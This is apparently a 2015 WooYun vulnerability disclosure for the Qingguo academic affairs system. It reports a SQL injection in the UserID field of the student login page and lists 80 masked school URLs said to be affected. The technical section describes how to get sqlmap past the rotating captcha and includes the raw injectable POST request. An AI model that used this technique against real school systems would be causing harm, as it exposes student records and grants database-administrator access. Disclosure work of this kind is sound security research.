当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125469

漏洞标题: 青果教务系统高危无限制注射(影响海量学校)

相关厂商:湖南青果软件有限公司

漏洞作者: 路人甲

提交时间:2015-07-09 10:45

修复时间:2015-10-12 10:47

公开时间:2015-10-12 10:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

这么严重的SQL注射;青果会来确认吗?

详细说明:

青果某系统存在无限制SQL注射;居然没有见到传说中的WAF拦截;并且大部分可以使用SQLMAP自动化注入测试工具进行测试;并且均为DBA权限;危害极大!
SQL Injection:

/_data/index_LOGIN.aspx   学生登录时UserID参数存在SQL注射漏洞


Case: 99%以上都是存在该漏洞;我想我该Mask一下保护这些学生!审核员你说呢?

mask 区域 
1.http://**.**.**/_data/index_LOGIN.aspx_
2.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
3.http://**.**.**//_data/index_LOGIN.aspx_
4.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
5.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
6.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
7.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
8.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
9.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
10.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
11.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
12.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
13.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
14.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
15.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
16.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
17.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
18.http://**.**.**/_data/index_LOGIN.aspx_
19.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
20.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
21.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
22.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
23.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
24.http://**.**.**/_data/index_LOGIN.aspx_
25.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
26.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
27.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
28.http://**.**.**/xsweb/(ratfv3201hlusmzcsyjkwn45)/_data/index_LOGIN.aspx_
29.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
30.http://**.**.**/XSWEB//_data/index_LOGIN.aspx_
31.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
32.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
33.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
34.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
35.http://**.**.**/_data/index_LOGIN.aspx_
36.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
37.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
38.http://**.**.**/_data/index_LOGIN.aspx_
39.http://**.**.**/_data/index_LOGIN.aspx_
40.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
41.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
42.http://**.**.**/Xsweb//_data/index_LOGIN.aspx_
43.http://**.**.**/_data/index_LOGIN.aspx_
44.http://**.**.**/bzzyxs//_data/index_LOGIN.aspx_
45.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
46.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
47.http://**.**.**/_data/index_LOGIN.aspx_
48.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
49.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
50.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
51.http://**.**.**/_data/index_LOGIN.aspx_
52.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
53.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
54.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
55.http://**.**.**/_data/index_LOGIN.aspx_
56.http://**.**.**/_data/index_LOGIN.aspx_
57.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
58.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
59.http://**.**.**/XSWEB//_data/index_LOGIN.aspx_
60.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
61.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
62.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
63.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
64.http://**.**.**/_data/index_LOGIN.aspx_
65.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
66.http://**.**.**//_data/index_LOGIN.aspx_
67.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
68.http://**.**.**/_data/index_LOGIN.aspx_
69.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
70.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
71.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
72.http://**.**.**/xsweb/_data/index_LOGIN.aspx_
73.http://**.**.**//_data/index_LOGIN.aspx_
74.http://**.**.**/_data/index_LOGIN.aspx_
75.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
76.http://**.**.**/xsweb//_data/index_LOGIN.aspx_
77.http://**.**.**//_data/index_LOGIN.aspx_
78.http://**.**.**///_data/index_LOGIN.aspx_
79.http://**.**.**/xsweb///_data/index_LOGIN.aspx_
80.http://**.**.**/xsweb//_data/index_LOGIN.aspx

漏洞证明:

Security Testing

手工
1、
01.png







07.png




2、SQLMAP自动化测试;使用SQLMAP自动化测试的方法就在于验证码会随机变换;经过测试在抓包获取POST提交数据后将CheckCode改为下一个验证码;注射参数后面*号标志即可绕过无限制SQL注射!
POST /xsweb/_data/index_LOGIN.aspx HTTP/1.1
Host: ***.**.***.**
Proxy-Connection: keep-alive
Content-Length: 141
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://***.**.***.*
User-Agent: **********************
Content-Type: application/x-www-form-urlencoded
Referer: http://***.**.***.*/xsweb/_data/index_LOGIN.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=rvmviarpqq0i3b3eemf5xmae
__VIEWSTATE=dDwtMTc5NzIxMDUzMDs7PlnVMA1CpUQ5r4Nrg5HDOU7eG%2BMh&pcInfo=&typeName=&Sel_Type=STU&UserID=aaa*&PassWord=aaaaa&random=新的验证码&sbtState=



08.png







09.png







10.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-12 10:47

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无